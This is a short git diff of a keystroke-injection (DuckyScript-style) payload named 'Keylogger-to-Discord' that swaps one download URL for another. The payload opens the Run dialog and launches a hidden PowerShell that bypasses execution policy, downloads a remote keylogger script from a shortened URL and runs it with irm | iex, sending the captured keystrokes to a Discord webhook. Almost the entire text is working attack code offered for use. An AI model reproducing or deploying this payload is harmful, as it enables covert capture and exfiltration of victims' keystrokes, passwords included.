diff --git a/Discord-Keylogger/Keylogger-to-Discord.txt b/Discord-Keylogger/Keylogger-to-Discord.txt index 2f0b945..7c90581 100644 --- a/Discord-Keylogger/Keylogger-to-Discord.txt +++ b/Discord-Keylogger/Keylogger-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_kl_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/dckl | iex ENTER